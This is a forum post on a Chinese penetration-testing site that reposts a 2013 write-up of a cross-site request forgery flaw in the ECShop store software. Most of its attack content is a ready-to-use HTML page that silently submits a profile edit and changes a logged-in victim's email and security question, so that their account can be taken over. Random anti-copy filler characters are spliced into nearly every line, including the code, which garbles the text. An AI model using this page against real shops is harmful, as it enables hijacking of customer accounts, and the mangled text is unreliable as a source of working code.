中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
; h; Z& }8 P  r/ ~8 D+ ~ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现& W1 b' K$ E9 @- f
+ K9 ^$ d% S+ M
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
+ y+ f8 T  S% ^/ M- o0 D) h4 @; i5 Z+ p# @& H
详细说明:
6 u& j' c+ }4 `* I6 Y' A利用csrf和xss可以突破官方所说的“障碍”
; n( p* F: n! [% Bxss版本已经有人说明
# E! \' s7 n: P, s7 h! t这里给出csrf版本7 P2 R4 N; g3 b1 f, V
6 P& a- ^+ u  B" v/ N, r+ C
漏洞证明:8 }/ P6 S$ P$ b3 E
<html>
; C6 d+ c/ ]! T7 d: K<body>+ D  Z% x9 n: A. P
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">9 O3 I1 h4 D' E
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">6 z" Y7 g( [, m7 _+ S
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
+ j1 Y1 n* {3 ]' |<INPUT TYPE="text" NAME="sel_question" value="ecshop">8 U) Y5 V2 h& e* Z/ c
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
: @0 ^, l6 ~  e# |. W6 N' S</body>
0 j! R  X# L) k" x2 U& q<script>
7 @' Z5 \  v% a; D% V2 {( U" p$ _document.forms[0].submit();
% h' |3 j4 C* a& T# W' C</script>
5 T* P4 J. ~7 J& \- N; i3 e! X</html>6 K# K2 I  @% L/ a* {$ \% @9 @
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
* v' ^9 J7 \$ [% q7 f( ]) S) \. w1 p: A





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2